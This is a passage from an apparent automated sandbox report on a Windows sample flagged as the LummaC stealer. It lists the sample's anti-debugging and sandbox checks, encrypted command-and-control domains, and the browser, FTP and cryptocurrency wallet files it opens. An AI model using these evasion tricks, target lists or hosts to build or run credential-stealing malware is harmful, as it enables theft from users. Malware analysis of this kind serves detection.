              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: file.exe, 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004B0F10 LdrInitializeThunk,1_2_004B0F10

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: file.exeString found in binary or memory: scriptyprefej.store
              Source: file.exeString found in binary or memory: navygenerayk.store
              Source: file.exeString found in binary or memory: founpiuer.store
              Source: file.exeString found in binary or memory: necklacedmny.store
              Source: file.exeString found in binary or memory: thumbystriw.store
              Source: file.exeString found in binary or memory: fadehairucw.store
              Source: file.exeString found in binary or memory: crisiwarny.store
              Source: file.exeString found in binary or memory: presticitpo.store
              Source: file.exe, 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: vProgram Manager
              Source: file.exeBinary or memory string: yvProgram Manager
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1433134397.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1447480635.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1382385573.0000000000B81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6636, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: file.exe, 00000001.00000003.1312488858.0000000000B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
              Source: file.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: file.exe, 00000001.00000002.1447480635.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: file.exe, 00000001.00000003.1335200391.0000000000B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ata%\\Exodus\\exodus
              Source: file.exeString found in binary or memory: Wallets/Exodus
              Source: file.exe, 00000001.00000003.1312424888.0000000000B7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Binance
              Source: file.exe, 00000001.00000002.1447480635.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: file.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exeString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
